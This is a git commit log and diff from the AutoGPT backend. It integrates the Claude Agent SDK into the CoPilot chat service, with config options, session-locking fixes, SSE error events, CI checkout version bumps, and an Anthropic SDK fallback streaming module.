  >2 message session files) and delete session_file.py + tests
- Embed prior conversation turns as <conversation_history> context in
  the user message for multi-turn memory
- Add context compaction using shared compress_context() from prompt.py
  with LLM summarization + truncation fallback for long conversations
- Reuse _build_system_prompt and _generate_session_title from parent
  service.py instead of duplicating (gains Langfuse prompt support)
- Add has_conversation_history param to _build_system_prompt to avoid
  greeting on multi-turn conversations
- Fix _SDK_TOOL_RESULTS_GLOB from hardcoded /root/ to expanduser ~/
2026-02-11 04:22:11 +04:00
Zamil Majdy
acb2d0bd1b fix(backend/chat): Resolve symlinks in session file path for --resume
The CLI resolves symlinks when computing its project directory (e.g.
/tmp -> /private/tmp on macOS), so our session file writes must use
the resolved path to match. Also adds cwd to ClaudeAgentOptions and
debug logging for SDK messages.
2026-02-10 20:11:16 +04:00
Zamil Majdy
51aa369c80 fix(backend): Restore PyYAML cp38 wheel entries in poetry.lock
Re-add Python 3.8 wheel entries for PyYAML that were dropped by
poetry lock resolution, keeping the lockfile consistent with dev.
2026-02-10 20:06:45 +04:00
Zamil Majdy
6403ffe353 fix(backend/chat): Use --resume with session files for multi-turn conversations
Replace broken AsyncIterable approach (CLI rejects assistant-type stdin
messages) with JSONL session files written to the CLI's storage directory.
This enables --resume to load full user+assistant context with turn-level
compaction support for long conversations.
2026-02-10 18:46:33 +04:00
Zamil Majdy
c40a98ba3c Merge branches 'feat/copitlot-claude-code' and 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code 2026-02-10 18:19:23 +04:00
Zamil Majdy
a31fc8b162 refactor(backend/chat): Use proper SDK types and in-memory conversation history
Replace duck typing (class name checks, getattr) with isinstance() using
SDK-exported dataclasses. Replace file-based --resume with AsyncIterable
message injection for conversation history, eliminating disk I/O. Add 15
unit tests for the response adapter.
2026-02-10 18:17:00 +04:00
Zamil Majdy
0f2d1a6553 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-10 17:23:06 +04:00
Zamil Majdy
87d817b83b fix(backend/chat): Allow MCP-registered tools through security hook and fix title generation
- Skip BLOCKED_TOOLS check for tools with mcp__copilot__ prefix since they
  are already sandboxed by tool_adapter (fixes Read tool being blocked)
- Fall back to session.messages for title generation when message=None
2026-02-10 17:15:42 +04:00
Zamil Majdy
acf932bf4f refactor(backend/chat): Move glob/os imports to top-level in SDK service 2026-02-10 16:57:11 +04:00
Zamil Majdy
f562d9a277 fix(backend/chat): Add Read tool for SDK oversized tool results
The Claude Agent SDK saves tool results exceeding its token limit to
files and instructs the agent to read them back with a Read tool. Our
MCP server didn't have this tool, breaking the agent on large results
like run_block output (117K+ chars).

Changes:
- Add a Read tool to the MCP server (restricted to /root/.claude/)
- Register it in COPILOT_TOOL_NAMES so the SDK can use it
- Add safety-net truncation at 500K chars for extreme cases
- Clean up SDK tool-result files after each client session
2026-02-10 16:53:04 +04:00
Zamil Majdy
3c92a96504 fix(backend/chat): Publish StreamError before StreamFinish on error paths
When run_ai_generation() or event_generator() encounter errors, they
were only publishing StreamFinish without a preceding StreamError. The
frontend treats finish-without-error as normal completion, leaving the
user with an apparently stuck/empty response requiring a page refresh.
2026-02-10 15:49:23 +04:00
Zamil Majdy
8b8e1df739 fix(backend/chat): Auto-expire stale running tasks to unblock sessions
Tasks stuck in "running" status beyond stream_timeout (300s) are now
auto-marked as failed when looked up, preventing zombie tasks from
blocking the session indefinitely.
2026-02-10 15:35:43 +04:00
Zamil Majdy
602a0a4fb1 fix(backend/chat): Strip tool call noise from conversation history context 2026-02-10 14:11:27 +04:00
Zamil Majdy
8d7d531ae0 refactor(backend/chat): Remove unused max_context_messages config 2026-02-10 13:57:33 +04:00
Zamil Majdy
43153a12e0 fix(backend/chat): Remove manual context truncation from SDK path, let SDK handle compaction 2026-02-10 13:52:49 +04:00
Zamil Majdy
587e11c60a refactor(backend/chat): Extract MCP server name constants to avoid hardcoded strings 2026-02-10 12:12:08 +04:00
Zamil Majdy
57da545e02 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-10 12:10:35 +04:00
Zamil Majdy
626980bf27 Merge branch 'dev' into feat/copitlot-claude-code 2026-02-09 19:26:52 +04:00
Swifty
e42b27af3c Merge branch 'dev' into feat/copitlot-claude-code 2026-02-09 09:12:23 +01:00
Zamil Majdy
34face15d2 fix lock 2026-02-09 11:45:59 +04:00
Zamil Majdy
7d32c83f95 fix(backend/chat): Handle non-serializable SDK objects in tool result output 2026-02-09 10:59:50 +04:00
Zamil Majdy
6e2a45b84e style(backend): Remove unused pytest import in execution_queue_test 2026-02-09 10:14:20 +04:00
Zamil Majdy
32f6532e9c Merge branch 'dev' of github.com:Significant-Gravitas/AutoGPT into feat/copitlot-claude-code 2026-02-09 10:10:32 +04:00
Zamil Majdy
0bbe8a184d Merge dev and resolve poetry.lock conflict 2026-02-08 19:40:17 +04:00
Zamil Majdy
7592deed63 fix(backend/chat): Address remaining PR review comments
- Fix tool_call_id always being "sdk-call" by generating unique IDs per invocation
- Fix validation using original tool_name instead of clean_name in security hooks
- Fix duplicate StreamFinish in Anthropic fallback path
- Fix ImportError fallback returning plain dict instead of re-raising
- Extract _build_input_schema helper to deduplicate schema construction
- Add else branch for unhandled SDK message types for observability
- Truncate large tool results in conversation history to prevent context overflow
2026-02-08 19:39:10 +04:00
Zamil Majdy
b9c759ce4f fix(backend/chat): Address additional PR review comments
- Add terminal StreamFinish in adapt_sdk_stream if SDK ends without one
- Sanitize error message in adapt_sdk_stream exception handler
- Pass full JSON schema (type, properties, required) to tool decorator
2026-02-08 07:14:45 +04:00
Zamil Majdy
5efb80d47b fix(backend/chat): Address PR review comments for Claude SDK integration
- Add StreamFinish after ErrorMessage in response adapter
- Fix str.replace to removeprefix in security hooks
- Apply max_context_messages limit as safety guard in history formatting
- Add empty prompt guard before sending to SDK
- Sanitize error messages to avoid exposing internal details
- Fix fire-and-forget asyncio.create_task by storing task reference
- Fix tool_calls population on assistant messages
- Rewrite Anthropic fallback to persist messages and merge consecutive roles
- Only use ANTHROPIC_API_KEY for fallback (not OpenRouter keys)
- Fix IndexError when tool result content list is empty
2026-02-06 13:25:10 +04:00
Zamil Majdy
b49d8e2cba fix lock 2026-02-06 13:19:53 +04:00
Zamil Majdy
452544530d feat(chat/sdk): Enable native SDK context compaction
- Remove manual truncation in conversation history formatting
- SDK's automatic compaction handles context limits intelligently
- Add observability hooks:
  - PreCompact: Log when SDK triggers context compaction
  - PostToolUse: Log successful tool executions
  - PostToolUseFailure: Log and debug failed tool executions
- Update config: increase max_context_messages (SDK handles compaction)
2026-02-06 12:44:48 +04:00
Zamil Majdy
32ee7e6cf8 fix(chat): Remove aggressive stale task detection
The 60-second timeout was too aggressive and could incorrectly mark
legitimate long-running tool calls as stale. Relying on Redis TTL
(1 hour) for cleanup is sufficient and more reliable.
2026-02-06 11:45:54 +04:00
Zamil Majdy
670663c406 Merge dev and resolve poetry.lock conflict 2026-02-06 11:40:41 +04:00
Zamil Majdy
0dbe4cf51e feat(backend/chat): Add Claude Agent SDK integration for CoPilot
This PR adds Claude Agent SDK as the default backend for CoPilot chat completions,
replacing the direct OpenAI API integration.

Key changes:
- Add Claude Agent SDK service layer with MCP tool adapter
- Fix message persistence after tool calls (messages no longer disappear on refresh)
- Add OpenRouter tracing for session title generation
- Add security hooks for user context validation
- Add Anthropic fallback when SDK is not available
- Clean up excessive debug logging
2026-02-06 11:38:17 +04:00
49 changed files with 3573 additions and 165 deletions

View File

@@ -22,7 +22,7 @@ jobs:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
ref: ${{ github.event.workflow_run.head_branch }}
fetch-depth: 0

View File

@@ -30,7 +30,7 @@ jobs:
actions: read # Required for CI access
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 1

View File

@@ -40,7 +40,7 @@ jobs:
actions: read # Required for CI access
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 1

View File

@@ -58,7 +58,7 @@ jobs:
# your codebase is analyzed, see https://docs.github.com/en/code-security/code-scanning/creating-an-advanced-setup-for-code-scanning/codeql-code-scanning-for-compiled-languages
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL

View File

@@ -27,7 +27,7 @@ jobs:
# If you do not check out your code, Copilot will do this for you.
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 0
submodules: true

View File

@@ -23,7 +23,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 1

View File

@@ -23,7 +23,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 0

View File

@@ -28,7 +28,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 1

View File

@@ -25,7 +25,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
ref: ${{ github.event.inputs.git_ref || github.ref_name }}

View File

@@ -17,7 +17,7 @@ jobs:
steps:
- name: Checkout code
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
ref: ${{ github.ref_name || 'master' }}

View File

@@ -68,7 +68,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 0
submodules: true

View File

@@ -31,7 +31,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
- name: Check for component changes
uses: dorny/paths-filter@v3
@@ -71,7 +71,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
- name: Set up Node.js
uses: actions/setup-node@v6
@@ -107,7 +107,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
fetch-depth: 0
@@ -148,7 +148,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
submodules: recursive
@@ -277,7 +277,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
submodules: recursive

View File

@@ -29,7 +29,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
- name: Set up Node.js
uses: actions/setup-node@v6
@@ -63,7 +63,7 @@ jobs:
steps:
- name: Checkout repository
uses: actions/checkout@v4
uses: actions/checkout@v6
with:
submodules: recursive

View File

@@ -11,7 +11,7 @@ jobs:
steps:
# - name: Wait some time for all actions to start
# run: sleep 30
- uses: actions/checkout@v4
- uses: actions/checkout@v6
# with:
# fetch-depth: 0
- name: Set up Python

View File

@@ -62,12 +62,16 @@ ENV POETRY_HOME=/opt/poetry \
DEBIAN_FRONTEND=noninteractive
ENV PATH=/opt/poetry/bin:$PATH
# Install Python, FFmpeg, and ImageMagick (required for video processing blocks)
# Install Python, FFmpeg, ImageMagick, and CLI tools for agent use
# CLI tools match ALLOWED_BASH_COMMANDS in security_hooks.py
RUN apt-get update && apt-get install -y \
python3.13 \
python3-pip \
ffmpeg \
imagemagick \
jq \
ripgrep \
tree \
&& rm -rf /var/lib/apt/lists/*
# Copy only necessary files from builder

View File

@@ -27,12 +27,11 @@ class ChatConfig(BaseSettings):
session_ttl: int = Field(default=43200, description="Session TTL in seconds")
# Streaming Configuration
max_context_messages: int = Field(
default=50, ge=1, le=200, description="Maximum context messages"
)
stream_timeout: int = Field(default=300, description="Stream timeout in seconds")
max_retries: int = Field(default=3, description="Maximum number of retries")
max_retries: int = Field(
default=3,
description="Max retries for fallback path (SDK handles retries internally)",
)
max_agent_runs: int = Field(default=30, description="Maximum number of agent runs")
max_agent_schedules: int = Field(
default=30, description="Maximum number of agent schedules"
@@ -93,6 +92,27 @@ class ChatConfig(BaseSettings):
description="Name of the prompt in Langfuse to fetch",
)
# Claude Agent SDK Configuration
use_claude_agent_sdk: bool = Field(
default=True,
description="Use Claude Agent SDK for chat completions",
)
claude_agent_model: str | None = Field(
default=None,
description="Model for the Claude Agent SDK path. If None, derives from "
"the `model` field by stripping the OpenRouter provider prefix.",
)
claude_agent_max_budget_usd: float | None = Field(
default=None,
gt=0,
description="Max budget in USD per Claude Agent SDK session (None = unlimited)",
)
claude_agent_max_buffer_size: int = Field(
default=10 * 1024 * 1024, # 10MB (default SDK is 1MB)
description="Max buffer size in bytes for Claude Agent SDK JSON message parsing. "
"Increase if tool outputs exceed the limit.",
)
# Extended thinking configuration for Claude models
thinking_enabled: bool = Field(
default=True,
@@ -138,6 +158,17 @@ class ChatConfig(BaseSettings):
v = os.getenv("CHAT_INTERNAL_API_KEY")
return v
@field_validator("use_claude_agent_sdk", mode="before")
@classmethod
def get_use_claude_agent_sdk(cls, v):
"""Get use_claude_agent_sdk from environment if not provided."""
# Check environment variable - default to True if not set
env_val = os.getenv("CHAT_USE_CLAUDE_AGENT_SDK", "").lower()
if env_val:
return env_val in ("true", "1", "yes", "on")
# Default to True (SDK enabled by default)
return True if v is None else v
# Prompt paths for different contexts
PROMPT_PATHS: dict[str, str] = {
"default": "prompts/chat_system.md",

View File

@@ -273,9 +273,8 @@ async def _get_session_from_cache(session_id: str) -> ChatSession | None:
try:
session = ChatSession.model_validate_json(raw_session)
logger.info(
f"Loading session {session_id} from cache: "
f"message_count={len(session.messages)}, "
f"roles={[m.role for m in session.messages]}"
f"[CACHE] Loaded session {session_id}: {len(session.messages)} messages, "
f"last_roles={[m.role for m in session.messages[-3:]]}" # Last 3 roles
)
return session
except Exception as e:
@@ -317,11 +316,9 @@ async def _get_session_from_db(session_id: str) -> ChatSession | None:
return None
messages = prisma_session.Messages
logger.info(
f"Loading session {session_id} from DB: "
f"has_messages={messages is not None}, "
f"message_count={len(messages) if messages else 0}, "
f"roles={[m.role for m in messages] if messages else []}"
logger.debug(
f"[DB] Loaded session {session_id}: {len(messages) if messages else 0} messages, "
f"roles={[m.role for m in messages[-3:]] if messages else []}" # Last 3 roles
)
return ChatSession.from_db(prisma_session, messages)
@@ -372,10 +369,9 @@ async def _save_session_to_db(
"function_call": msg.function_call,
}
)
logger.info(
f"Saving {len(new_messages)} new messages to DB for session {session.session_id}: "
f"roles={[m['role'] for m in messages_data]}, "
f"start_sequence={existing_message_count}"
logger.debug(
f"[DB] Saving {len(new_messages)} messages to session {session.session_id}, "
f"roles={[m['role'] for m in messages_data]}"
)
await chat_db.add_chat_messages_batch(
session_id=session.session_id,
@@ -415,7 +411,7 @@ async def get_chat_session(
logger.warning(f"Unexpected cache error for session {session_id}: {e}")
# Fall back to database
logger.info(f"Session {session_id} not in cache, checking database")
logger.debug(f"Session {session_id} not in cache, checking database")
session = await _get_session_from_db(session_id)
if session is None:
@@ -432,7 +428,6 @@ async def get_chat_session(
# Cache the session from DB
try:
await _cache_session(session)
logger.info(f"Cached session {session_id} from database")
except Exception as e:
logger.warning(f"Failed to cache session {session_id}: {e}")
@@ -497,6 +492,40 @@ async def upsert_chat_session(
return session
async def append_and_save_message(session_id: str, message: ChatMessage) -> ChatSession:
"""Atomically append a message to a session and persist it.
Acquires the session lock, re-fetches the latest session state,
appends the message, and saves — preventing message loss when
concurrent requests modify the same session.
"""
lock = await _get_session_lock(session_id)
async with lock:
session = await get_chat_session(session_id)
if session is None:
raise ValueError(f"Session {session_id} not found")
session.messages.append(message)
existing_message_count = await chat_db.get_chat_session_message_count(
session_id
)
try:
await _save_session_to_db(session, existing_message_count)
except Exception as e:
raise DatabaseError(
f"Failed to persist message to session {session_id}"
) from e
try:
await _cache_session(session)
except Exception as e:
logger.warning(f"Cache write failed for session {session_id}: {e}")
return session
async def create_chat_session(user_id: str) -> ChatSession:
"""Create a new chat session and persist it.
@@ -603,13 +632,19 @@ async def update_session_title(session_id: str, title: str) -> bool:
logger.warning(f"Session {session_id} not found for title update")
return False
# Invalidate cache so next fetch gets updated title
# Update title in cache if it exists (instead of invalidating).
# This prevents race conditions where cache invalidation causes
# the frontend to see stale DB data while streaming is still in progress.
try:
redis_key = _get_session_cache_key(session_id)
async_redis = await get_redis_async()
await async_redis.delete(redis_key)
cached = await _get_session_from_cache(session_id)
if cached:
cached.title = title
await _cache_session(cached)
except Exception as e:
logger.warning(f"Failed to invalidate cache for session {session_id}: {e}")
# Not critical - title will be correct on next full cache refresh
logger.warning(
f"Failed to update title in cache for session {session_id}: {e}"
)
return True
except Exception as e:

View File

@@ -10,6 +10,8 @@ from typing import Any
from pydantic import BaseModel, Field
from backend.util.json import dumps as json_dumps
class ResponseType(str, Enum):
"""Types of streaming responses following AI SDK protocol."""
@@ -193,6 +195,18 @@ class StreamError(StreamBaseResponse):
default=None, description="Additional error details"
)
def to_sse(self) -> str:
"""Convert to SSE format, only emitting fields required by AI SDK protocol.
The AI SDK uses z.strictObject({type, errorText}) which rejects
any extra fields like `code` or `details`.
"""
data = {
"type": self.type.value,
"errorText": self.errorText,
}
return f"data: {json_dumps(data)}\n\n"
class StreamHeartbeat(StreamBaseResponse):
"""Heartbeat to keep SSE connection alive during long-running operations.

View File

@@ -1,5 +1,6 @@
"""Chat API routes for chat session management and streaming via SSE."""
import asyncio
import logging
import uuid as uuid_module
from collections.abc import AsyncGenerator
@@ -16,8 +17,16 @@ from . import service as chat_service
from . import stream_registry
from .completion_handler import process_operation_failure, process_operation_success
from .config import ChatConfig
from .model import ChatSession, create_chat_session, get_chat_session, get_user_sessions
from .response_model import StreamFinish, StreamHeartbeat
from .model import (
ChatMessage,
ChatSession,
append_and_save_message,
create_chat_session,
get_chat_session,
get_user_sessions,
)
from .response_model import StreamError, StreamFinish, StreamHeartbeat, StreamStart
from .sdk import service as sdk_service
from .tools.models import (
AgentDetailsResponse,
AgentOutputResponse,
@@ -40,6 +49,7 @@ from .tools.models import (
SetupRequirementsResponse,
UnderstandingUpdatedResponse,
)
from .tracking import track_user_message
config = ChatConfig()
@@ -231,6 +241,10 @@ async def get_session(
active_task, last_message_id = await stream_registry.get_active_task_for_session(
session_id, user_id
)
logger.info(
f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
)
if active_task:
# Filter out the in-progress assistant message from the session response.
# The client will receive the complete assistant response through the SSE
@@ -300,10 +314,9 @@ async def stream_chat_post(
f"user={user_id}, message_len={len(request.message)}",
extra={"json_fields": log_meta},
)
session = await _validate_and_get_session(session_id, user_id)
logger.info(
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -312,6 +325,25 @@ async def stream_chat_post(
},
)
# Atomically append user message to session BEFORE creating task to avoid
# race condition where GET_SESSION sees task as "running" but message isn't
# saved yet. append_and_save_message re-fetches inside a lock to prevent
# message loss from concurrent requests.
if request.message:
message = ChatMessage(
role="user" if request.is_user_message else "assistant",
content=request.message,
)
if request.is_user_message:
track_user_message(
user_id=user_id,
session_id=session_id,
message_length=len(request.message),
)
logger.info(f"[STREAM] Saving user message to session {session_id}")
session = await append_and_save_message(session_id, message)
logger.info(f"[STREAM] User message saved for session {session_id}")
# Create a task in the stream registry for reconnection support
task_id = str(uuid_module.uuid4())
operation_id = str(uuid_module.uuid4())
@@ -327,7 +359,7 @@ async def stream_chat_post(
operation_id=operation_id,
)
logger.info(
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
@@ -348,15 +380,43 @@ async def stream_chat_post(
first_chunk_time, ttfc = None, None
chunk_count = 0
try:
async for chunk in chat_service.stream_chat_completion(
# Emit a start event with task_id for reconnection
start_chunk = StreamStart(messageId=task_id, taskId=task_id)
await stream_registry.publish_chunk(task_id, start_chunk)
logger.info(
f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
extra={
"json_fields": {
**log_meta,
"elapsed_ms": (time_module.perf_counter() - gen_start_time)
* 1000,
}
},
)
# Choose service based on configuration
use_sdk = config.use_claude_agent_sdk
stream_fn = (
sdk_service.stream_chat_completion_sdk
if use_sdk
else chat_service.stream_chat_completion
)
logger.info(
f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
extra={"json_fields": log_meta},
)
# Pass message=None since we already added it to the session above
async for chunk in stream_fn(
session_id,
request.message,
None, # Message already in session
is_user_message=request.is_user_message,
user_id=user_id,
session=session, # Pass pre-fetched session to avoid double-fetch
session=session, # Pass session with message already added
context=request.context,
_task_id=task_id, # Pass task_id so service emits start with taskId for reconnection
):
# Skip duplicate StreamStart — we already published one above
if isinstance(chunk, StreamStart):
continue
chunk_count += 1
if first_chunk_time is None:
first_chunk_time = time_module.perf_counter()
@@ -377,7 +437,7 @@ async def stream_chat_post(
gen_end_time = time_module.perf_counter()
total_time = (gen_end_time - gen_start_time) * 1000
logger.info(
f"[TIMING] run_ai_generation FINISHED in {total_time/1000:.1f}s; "
f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
f"task={task_id}, session={session_id}, "
f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
extra={
@@ -404,6 +464,17 @@ async def stream_chat_post(
}
},
)
# Publish a StreamError so the frontend can display an error message
try:
await stream_registry.publish_chunk(
task_id,
StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
),
)
except Exception:
pass # Best-effort; mark_task_completed will publish StreamFinish
await stream_registry.mark_task_completed(task_id, "failed")
# Start the AI generation in a background task
@@ -506,8 +577,14 @@ async def stream_chat_post(
"json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
},
)
# Surface error to frontend so it doesn't appear stuck
yield StreamError(
errorText="An error occurred. Please try again.",
code="stream_error",
).to_sse()
yield StreamFinish().to_sse()
finally:
# Unsubscribe when client disconnects or stream ends to prevent resource leak
# Unsubscribe when client disconnects or stream ends
if subscriber_queue is not None:
try:
await stream_registry.unsubscribe_from_task(
@@ -751,8 +828,6 @@ async def stream_task(
)
async def event_generator() -> AsyncGenerator[str, None]:
import asyncio
heartbeat_interval = 15.0 # Send heartbeat every 15 seconds
try:
while True:

View File

@@ -0,0 +1,14 @@
"""Claude Agent SDK integration for CoPilot.
This module provides the integration layer between the Claude Agent SDK
and the existing CoPilot tool system, enabling drop-in replacement of
the current LLM orchestration with the battle-tested Claude Agent SDK.
"""
from .service import stream_chat_completion_sdk
from .tool_adapter import create_copilot_mcp_server
__all__ = [
"stream_chat_completion_sdk",
"create_copilot_mcp_server",
]

View File

@@ -0,0 +1,363 @@
"""Anthropic SDK fallback implementation.
This module provides the fallback streaming implementation using the Anthropic SDK
directly when the Claude Agent SDK is not available.
"""
import json
import logging
import uuid
from collections.abc import AsyncGenerator
from typing import Any, cast
from ..config import ChatConfig
from ..model import ChatMessage, ChatSession
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from .tool_adapter import get_tool_definitions, get_tool_handlers
logger = logging.getLogger(__name__)
config = ChatConfig()
# Maximum tool-call iterations before stopping to prevent infinite loops
_MAX_TOOL_ITERATIONS = 10
async def stream_with_anthropic(
session: ChatSession,
system_prompt: str,
text_block_id: str,
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream using Anthropic SDK directly with tool calling support.
This function accumulates messages into the session for persistence.
The caller should NOT yield an additional StreamFinish - this function handles it.
"""
import anthropic
# Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
# with config.base_url for OpenRouter routing — matching the non-SDK path.
api_key = config.api_key
if not api_key:
yield StreamError(
errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
code="config_error",
)
yield StreamFinish()
return
# Build kwargs for the Anthropic client — use base_url if configured
client_kwargs: dict[str, Any] = {"api_key": api_key}
if config.base_url:
# Strip /v1 suffix — Anthropic SDK adds its own version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
client_kwargs["base_url"] = base
client = anthropic.AsyncAnthropic(**client_kwargs)
tool_definitions = get_tool_definitions()
tool_handlers = get_tool_handlers()
anthropic_tools = [
{
"name": t["name"],
"description": t["description"],
"input_schema": t["inputSchema"],
}
for t in tool_definitions
]
anthropic_messages = _convert_session_to_anthropic(session)
if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
anthropic_messages.append(
{"role": "user", "content": "Continue with the task."}
)
has_started_text = False
accumulated_text = ""
accumulated_tool_calls: list[dict[str, Any]] = []
for _ in range(_MAX_TOOL_ITERATIONS):
try:
async with client.messages.stream(
model=(
config.model.split("/")[-1] if "/" in config.model else config.model
),
max_tokens=4096,
system=system_prompt,
messages=cast(Any, anthropic_messages),
tools=cast(Any, anthropic_tools) if anthropic_tools else [],
) as stream:
async for event in stream:
if event.type == "content_block_start":
block = event.content_block
if hasattr(block, "type"):
if block.type == "text" and not has_started_text:
yield StreamTextStart(id=text_block_id)
has_started_text = True
elif block.type == "tool_use":
yield StreamToolInputStart(
toolCallId=block.id, toolName=block.name
)
elif event.type == "content_block_delta":
delta = event.delta
if hasattr(delta, "type") and delta.type == "text_delta":
accumulated_text += delta.text
yield StreamTextDelta(id=text_block_id, delta=delta.text)
final_message = await stream.get_final_message()
if final_message.stop_reason == "tool_use":
if has_started_text:
yield StreamTextEnd(id=text_block_id)
has_started_text = False
text_block_id = str(uuid.uuid4())
tool_results = []
assistant_content: list[dict[str, Any]] = []
for block in final_message.content:
if block.type == "text":
assistant_content.append(
{"type": "text", "text": block.text}
)
elif block.type == "tool_use":
assistant_content.append(
{
"type": "tool_use",
"id": block.id,
"name": block.name,
"input": block.input,
}
)
# Track tool call for session persistence
accumulated_tool_calls.append(
{
"id": block.id,
"type": "function",
"function": {
"name": block.name,
"arguments": json.dumps(
block.input
if isinstance(block.input, dict)
else {}
),
},
}
)
yield StreamToolInputAvailable(
toolCallId=block.id,
toolName=block.name,
input=(
block.input if isinstance(block.input, dict) else {}
),
)
output, is_error = await _execute_tool(
block.name, block.input, tool_handlers
)
yield StreamToolOutputAvailable(
toolCallId=block.id,
toolName=block.name,
output=output,
success=not is_error,
)
# Save tool result to session
session.messages.append(
ChatMessage(
role="tool",
content=output,
tool_call_id=block.id,
)
)
tool_results.append(
{
"type": "tool_result",
"tool_use_id": block.id,
"content": output,
"is_error": is_error,
}
)
# Save assistant message with tool calls to session
session.messages.append(
ChatMessage(
role="assistant",
content=accumulated_text or None,
tool_calls=(
accumulated_tool_calls
if accumulated_tool_calls
else None
),
)
)
# Reset for next iteration
accumulated_text = ""
accumulated_tool_calls = []
anthropic_messages.append(
{"role": "assistant", "content": assistant_content}
)
anthropic_messages.append({"role": "user", "content": tool_results})
continue
else:
if has_started_text:
yield StreamTextEnd(id=text_block_id)
# Save final assistant response to session
if accumulated_text:
session.messages.append(
ChatMessage(role="assistant", content=accumulated_text)
)
yield StreamUsage(
promptTokens=final_message.usage.input_tokens,
completionTokens=final_message.usage.output_tokens,
totalTokens=final_message.usage.input_tokens
+ final_message.usage.output_tokens,
)
yield StreamFinish()
return
except Exception as e:
logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
yield StreamError(
errorText="An error occurred. Please try again.",
code="anthropic_error",
)
yield StreamFinish()
return
yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
yield StreamFinish()
def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
"""Convert session messages to Anthropic format.
Handles merging consecutive same-role messages (Anthropic requires alternating roles).
"""
messages: list[dict[str, Any]] = []
for msg in session.messages:
if msg.role == "user":
new_msg = {"role": "user", "content": msg.content or ""}
elif msg.role == "assistant":
content: list[dict[str, Any]] = []
if msg.content:
content.append({"type": "text", "text": msg.content})
if msg.tool_calls:
for tc in msg.tool_calls:
func = tc.get("function", {})
args = func.get("arguments", {})
if isinstance(args, str):
try:
args = json.loads(args)
except json.JSONDecodeError:
args = {}
content.append(
{
"type": "tool_use",
"id": tc.get("id", str(uuid.uuid4())),
"name": func.get("name", ""),
"input": args,
}
)
if content:
new_msg = {"role": "assistant", "content": content}
else:
continue # Skip empty assistant messages
elif msg.role == "tool":
new_msg = {
"role": "user",
"content": [
{
"type": "tool_result",
"tool_use_id": msg.tool_call_id or "",
"content": msg.content or "",
}
],
}
else:
continue
messages.append(new_msg)
# Merge consecutive same-role messages (Anthropic requires alternating roles)
return _merge_consecutive_roles(messages)
def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Merge consecutive messages with the same role.
Anthropic API requires alternating user/assistant roles.
"""
if not messages:
return []
merged: list[dict[str, Any]] = []
for msg in messages:
if merged and merged[-1]["role"] == msg["role"]:
# Merge with previous message
prev_content = merged[-1]["content"]
new_content = msg["content"]
# Normalize both to list-of-blocks form
if isinstance(prev_content, str):
prev_content = [{"type": "text", "text": prev_content}]
if isinstance(new_content, str):
new_content = [{"type": "text", "text": new_content}]
# Ensure both are lists
if not isinstance(prev_content, list):
prev_content = [prev_content]
if not isinstance(new_content, list):
new_content = [new_content]
merged[-1]["content"] = prev_content + new_content
else:
merged.append(msg)
return merged
async def _execute_tool(
tool_name: str, tool_input: Any, handlers: dict[str, Any]
) -> tuple[str, bool]:
"""Execute a tool and return (output, is_error)."""
handler = handlers.get(tool_name)
if not handler:
return f"Unknown tool: {tool_name}", True
try:
